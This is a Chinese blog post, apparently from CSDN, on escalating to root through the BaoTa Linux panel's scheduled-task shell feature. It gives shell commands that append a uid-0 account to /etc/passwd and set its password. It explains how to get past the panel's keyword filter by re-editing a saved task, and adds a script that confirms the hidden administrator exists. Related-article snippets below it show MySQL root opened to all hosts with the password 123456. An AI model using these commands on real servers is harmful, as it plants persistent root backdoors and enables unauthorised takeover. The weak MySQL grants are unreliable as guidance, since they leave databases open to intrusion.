宝塔开启root_宝塔linux面板获取服务器root权限方法。(非漏洞BUG)

最新推荐文章于 2024-06-02 16:59:56 发布
最新推荐文章于 2024-06-02 16:59:56 发布
阅读量3.5k 收藏
点赞数
文章标签: 宝塔开启root
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39960147/article/details/111812114
版权

宝塔linux面板安全吗?这个问题大家都很担心,毕竟作为线上生产环境一旦出现问题相当麻烦。

2017/5/24更新宝塔linux面板获取服务器root权限方法。

宝塔的出现更多是为了方便对linux不熟悉的用户

计划任务中支持shell脚本 经测试可以通过计划任务获取服务器root权限。

如果一旦被非法获取到宝塔面板后台登录资料服务器将岌岌可危

shell内容:

echo "wwwtiewwcom::0:0::/:/bin/bash" >> /etc/passwd

echo "www.tieww.com" | passwd --stdin wwwtiewwcom > /dev/null

完事后就可以使用wwwtiewwcom登录系统。

2017/5/24更新

据官方透露计划任务shell在新版已经无法通过shell代码进行提权,真的不能提权了吗?

然而铁网维在最新版本: 4.2.1中测试提交shell代码发现一些重要关键词已经被过滤,当我重新编辑保存时发现shell代码重要关键词并没有做过滤。

如下图:过滤了:passwd  –stdin

当我们添加计划任务后再重新编辑保存,点击执行打开执行日志 如下图:

成功添加管理员wwwtiewwcom,存在的管理员有:root wwwtiewwcom

判断shell如下:

mesg=`awk -F: '($3 == 0) { print $1 }' /etc/passwd|grep -v root`

mesg1=`awk -F: '($3 == 0) { print $1 }' /etc/passwd`

if [ -z $mesg ]

then

echo "There don't have other user uid=0"

else

echo "$mesg添加成功"

echo "系统管理员:$mesg1"

fi

服务器root权限顺利带走,最后声明本获取root方法并非宝塔面板设计缺陷漏洞bug,而是宝塔是为了面板的易用性。

本教程由铁网维原创出品 服务器运维官方网址http://www.tieww.com 欢迎大家多多关注本站 感谢大家的支持。

weixin_39960147
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
宝塔mysql root远程登录权限
xiangshanqishi的专栏
01-12 4820
mysql7以下做一下两步操作 1. GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' 这里的123456为你给新增权限用户设置的密码,%代表所有主机,也可以具体到你的主机ip地址 2.flush privileges; 这一步一定要做,不然无法成功! 这句表示从mysql数据库的grant表中重新加载权限数据 mysql8.0以后已经不支持,所以必须先创建用户,然后再授权,命令如下: mysql> CREAT
BT宝塔Linux服务器管理助手架设VPS面板(安装及初始设置应用)
09-15
主要介绍了BT宝塔Linux服务器管理助手架设 面板也是就是BT宝塔助手安装及初始设置应用演示,需要的朋友可以参考下
宝塔终端切换root用户为www
will_csdn_go的博客
05-19 2361
sudo su - www -s /bin/bash
宝塔面板漏洞_堡塔企业版安全工具:系统漏洞扫描,一键修复Linux系统常见漏洞_详细攻防教程
最新发布
程序员三九的博客
06-02 393
01系统漏洞扫描工具介绍 一些企业服务器经常受到黑客扫描漏洞入侵,但又无法知道是哪里出现了漏洞隐患的问题。相信这问题是很多企业和网络安全工程师都头疼的问题。
宝塔mysql增加root远程登录
热门推荐
过眼云烟—了凡
03-05 1万+
用了好久的宝塔,一直是单数据库登陆维护,今天在网上找到了群体维护的方法,因为root账号设置的是不能远程访问。 但因为是自己的测试服务器,就要改一下了,方便一点,经测试,成功: 1. GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' 这里的123456为你给新增权限用户设置的密码,%代表所有主机,也可以具体到...
宝塔mysql外网链接开放root用户
Wrry_L先生
05-13 1239
1.进入mysql 2.GRANT ALL PRIVILEGES ON . TO ‘root’@’%’ IDENTIFIED BY ‘root’ 开放root 用户 3.flush privileges 刷新用户权限 4.记得开放宝塔数据库端口和服务器数据库端口
本机ip查询器单文件_通过配置文件来管理你的服务器连接
weixin_39828956的博客
12-11 83
当你频繁ssh连接某一台服务器的时候有没有觉得好累,每次都要去笔记本copy服务器ip然后输入密码从而连接到对应的服务器。小编教你一个小技巧(以Mac为例)快速管理服务器ssh连接将你电脑的公钥放入服务器中本机: cat~/.ssh/id_rsa.pub登录服务器:vim~/.ssh/authorized_keys将上一步的结果复制进去本机配置文件vim~/.ssh/configHos...
腾讯云服务器修改为root登录安装宝塔面板
满堂花醉三千客,一剑霜寒十四州
08-08 3013
之前用的香港服务器,想换成大陆的,买了腾讯云的服务器。和别的云稍有不同,腾讯云服务器安装Linux服务器时,登录名被默认设置为ubuntu,而禁止使用root。腾讯云的远程登录,支持一键登录、VNC登录和ssh登录。一键登录:在腾讯云控制台,服务器详情页面即可登录。毕竟你自己买的服务器,肯定随便登录撒,要什么密码。此种方式也是在浏览器中新打开一个登录页面,支持复制粘贴。VNC登录:在浏览器界面远程登录,这里要输入你的用户名和密码,这个页面不支持复制粘贴。.........
服务器安装宝塔面板无法远程连接数据库的解决方法
01-20
在搭建个人网站的过程中,使用了腾讯云的Linux服务器并安装了宝塔Linux面板来简化管理。宝塔面板提供了一个图形化的界面,使得不熟悉Linux服务器的用户也能方便地配置环境和管理服务。在安装网站程序时,特别是选择...
宝塔面板linux版装在/www以外的目录的方法
09-15
宝塔安装完整环境基本5个G没有了,用了不到几个月,随着日志文件等乱七八糟的东西增加,面板就提示根目录低于1个G,随后mysql就莫名其妙挂掉,这里就为大家分享一下将面板安装到别的目录的方法
宝塔linux面板常用命令大全
03-20
安装宝塔 Centos安装脚本 ...Ubuntu/Deepin安装脚本 ...Debian安装脚本 ...Fedora安装脚本 ...管理宝塔 宝塔工具箱(包含下列绝大部分功能 直接ssh中执行bt命令 仅限6.x以上版本面板) bt 更多内容请下载查看......
宝塔面板linux 7.9.7 开心企业版
01-26
宝塔Linux面板 7.9.7 开心企业版。 安装时有广告,有无后门自己查杀。 我安装了,没有广告,有没有后门我就不知道了。 企业版功能: 基础功能 网站管理 FTP管理 数据库管理 资源监控 文件管理 终端功能 计划任务 ...
宝塔Linux面板之好用免费的中文Linux VPS主机控制面板适合快速建站
09-15
本篇文章主要介绍了宝塔Linux面板之好用免费的中文Linux VPS主机控制面板适合快速建站,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
linux服务器宝塔面板的卸载
01-07
然而,,,可能家里网络不是特别好,在安装bt的时候肯能出现了小问题,导致后期的LNMP安装不上,所以决定卸载了已经安装的面板,看了看相关命令,卸载宝塔面板: service bt stop && chkconfig –del bt && rm -f /...
宝塔Linux面板 2.8.9稳定版介绍
09-15
主要介绍了宝塔Linux面板 2.8.9稳定版介绍,需要的朋友可以参考下
服务器宝塔面板的安装图文教程详解
09-29
服务器宝塔面板是一款针对Linux服务器的运维工具,它提供了可视化的管理界面,使得新手在面对复杂的命令行操作时能够更加轻松地管理服务器。本文将详细介绍如何在云服务器上安装宝塔面板,并配置必要的端口以确保...
宝塔宝塔终端切换root用户为www
aadnf的博客
09-08 1708
推荐使用:切换到用户 www 下执行。
Ubuntu下root账户在终端中切换到root帐户
程序员的另一世界
03-18 1131
①如果知道密码,则进入终端,输入指令:su root,再输入密码 ②如果不知道密码,进入终端,输入指令:sudo passwd root     ******(输入当前用户的口令)       ******(输入新的root口令,可以保持原样。我就保持的原样)       ******(再次输入新的root口令)   ③重新输入指令:su root,在输入密码。
Linux宝塔面板批量修改文件夹权限所有者的问题
fobweb的博客
05-30 7659
宝塔面板解压文件之后所有解压出来的文件全部变成了root权限, 如果要修改成www权限 (只修改权限所有者,不修改权限值)。 点击文件管理菜单栏里的“终端” (在刷新按钮旁),复制发送以下指令: chown www:www 你的文件夹 -R (把“你的文件夹”改成要修改的文件夹名称) ...
linux服务器如何安装宝塔面板
04-01
1. 下载宝塔面板安装包 首先,你需要从宝塔官网下载安装包,地址为 https://www.bt.cn/download/linux.html 。 2. 安装宝塔面板 将下载好的安装包上传到服务器上,并解压到指定目录(比如 /tmp 目录): tar -zxvf BT-panel-7.4.3.tar.gz -C /tmp 切换到解压后的目录并执行安装脚本: cd /tmp/bt-panel-7.4.3 bash install.sh 安装过程中会提示输入管理员账号和密码,这里需要输入一个用于登录宝塔面板的账号和密码。 3. 配置防火墙 如果你的服务器开启了防火墙,需要打开宝塔面板所需的端口,包括 20、21、80、443、888、8888、8889、39000-40000 等端口。 4. 登录宝塔面板 安装完成后,可以在浏览器中输入服务器的IP地址或域名,然后在登录页面输入管理员账号和密码进行登录。 总结 安装宝塔面板常简单,只需下载安装包并执行安装脚本即可。在使用宝塔面板前,需要确保服务器已经打开所需的端口,否则无法正常使用宝塔面板

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值